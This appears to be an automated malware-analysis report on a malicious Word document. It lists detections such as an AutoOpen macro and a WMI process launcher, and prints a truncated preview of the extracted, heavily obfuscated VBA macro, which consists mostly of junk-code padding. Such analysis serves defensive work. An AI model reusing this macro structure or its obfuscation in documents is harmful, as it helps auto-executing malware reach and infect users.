MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1137.001 Office Application Startup: Office Test Scripts
The sample contains VBA macros with an autoopen subroutine, a common technique for executing malicious code upon document opening. Heuristics indicate the use of WMI to launch processes, suggesting the macro is designed to download and execute a secondary payload. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions.
Heuristics 8
-
ClamAV: Doc.Malware.00536d-6937584-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6937584-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38923 bytes |
SHA-256: 87a21b2626eed3b43c3d81d457e96746ed9034c71f22ec4d01c3497f64219841 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Z4AxBUc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jx4Zc_U"
Attribute VB_Base = "0{103C49B8-CDD4-4761-8662-1EFAF30F852B}{FE5D26C4-8E51-4B39-AC38-D33FFB7A4504}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "wAAGUck"
Attribute VB_Base = "0{53B6AC09-460C-4DD2-9130-82F9FDFEB4A9}{00D347EF-3C70-4BB3-853B-FD2C9D3A214A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "QAkGXwQ"
Sub autoopen()
If EQ_UQ_C = Nk4wAA Then
Do While jAUBD_QB And IABDX_D
While OABA4U And 64732849
oAAAA4k = Asc(950034646 / Oct(531804896))
Wend
For RCBAcAZU = 172177485 To 951924674
wcADAA = 99237868
Next
Set wkAUBQ = wwCQAU
If hGAoGDA Eqv 642833417 Then
h_QAAAkC = CDate(ZwUAAAXU)
End If
While I1_AUA1 < dGAC4oA
EZAo1ZBA = (IZAU_kA)
Wend
Loop
End If
If OQ1BQAAA = cGGAZZ Then
Do While ocAAGD And kAUA4A
While jUZQAk And 887881186
ADAAkXoG = Asc(597044215 / Oct(411318129))
Wend
For sBX4UAUo = 372831526 To 729711231
bckcG_A = 78672383
Next
Set iAZcBwQD = WDQQAX
If IX11wkA Eqv 118078820 Then
AAQQCDXA = CDate(I_DcADX)
End If
While iGZkAA < UQUA_AA
NAAUDoAo = (s1QAAZA_)
Wend
Loop
End If
p_1DGA
If JkUBC1x = dU1kAZA Then
Do While M1D1BU_ And UAACAAGU
While bAUAkDA And 984689681
wAUAZkX = Asc(334995197 / Oct(897233447))
Wend
For FXDAAA = 602540804 To 964581166
nwA1kBQ = 941713516
Next
Set VxwCBAc_ = RZcxAk
If qAAxZk Eqv 224799144 Then
SU1AUCZ = CDate(wUAAAA)
End If
While EAAoBcAA < RUQDUc
EAQCQZD = (hAQA1G)
Wend
Loop
End If
If v14QxBA = NkAGoC_D Then
Do While MC_AUwG And WB4QkZ
While AUkk_QA And 609792284
IUc_AABU = Asc(421335260 / Oct(437109608))
Wend
For dAckDk = 660095315 To 340121662
mZ_GoA = 758445518
Next
Set KX_QwwCU = lAUcABAA
If jCoDcA Eqv 487373023 Then
vBAcUAxD = CDate(uUUBUcDA)
End If
While qDkU1kA < cBAC4oD
zAAAxU = (uD_Do4cD)
Wend
Loop
End If
If SXGUAD = uAZAB1 Then
Do While a4DAAA4B And JoAkAAQC
While hAXUUAwU And 534573086
aAZoUAo = Asc(669997128 / Oct(709023313))
Wend
For qAABUQUA = 514942717 To 603920911
S_UUkxU = 912727991
Next
Set TGAAwAAG = GBwAQk
If zDAAAck Eqv 427663115 Then
oA1A_xo = CDate(tBQABA)
End If
While bw_4c1C < b_AAGA
uAx_DwAQ = (uXCA41Z4)
Wend
Loop
End If
End Sub
Attribute VB_Name = "LU4xGUA"
Function p_1DGA()
On Error Resume Next
If XAAcAADG = dAAAx_ Then
Do While V4xQAX4X And RAXCADAw
While MokoBZ And 148684133
zAADAAQA = Asc(665758444 / Oct(655490864))
Wend
For X4XAUD4 = 723080684 To 878588818
LAQQZkAA = 31076117
Next
Set EAx1DA = jBAoQ1A
If VQAAoAk Eqv 543730137 Then
PQAACU = CDate(GAkU_4A)
End If
While wCAAB4 < ZDXwxo
sBGCG1 = (mQXDUDA)
Wend
Loop
End If
If uc1_kDQ = IcABABCU Then
Do While nAwA_BAQ And ikQAXG
While PcA1XQZk And 771568086
tUAQDU = Asc(934442094 / Oct(684405984))
Wend
For fAA_QDAA = 133477167 To 381864372
CUwA_AA1 = 354283342
Next
Set RXUADAXA = DGXABUU
If hXADGAQ Eqv 358754312 Then
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.